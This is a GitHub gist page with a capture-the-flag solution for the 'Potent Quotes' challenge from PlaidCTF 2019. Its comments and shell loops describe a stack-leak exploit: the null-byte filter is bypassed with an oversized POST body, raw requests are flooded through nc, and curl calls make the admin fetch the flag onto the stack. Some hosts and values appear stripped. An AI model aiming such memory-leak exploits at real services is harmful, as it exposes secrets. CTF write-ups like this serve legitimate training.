Skip to content

Instantly share code, notes, and snippets.

Last active April 15, 2019 10:54
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Solution for Potent Quotes #pctf2019
# The main issue was that nullbytes were being blocked so we needed a chunk of stack
# that did not contain any null bytes
# The trick was to put a huge body into the POST /api/flag request so it will fill most of the stack with printable characters
# And then just leaking it
#In terminal 1 run (leaking the stack to the file, looking for Location: header
for j in {0..10}; do for i in {0..20}; do
printf "POST /quotes/new HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9000\r\n\r\nattribute=&quote=$$$$$$$$$$$"
| nc 1337 -q 1 >> aaa &; done; sleep 1; done
#In terminal 2 and 3 run (to steal admin's attention :P and get the flag on their behalf so it will be put on the stack)
for i in {0..20}; do curl -d 'path='; done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment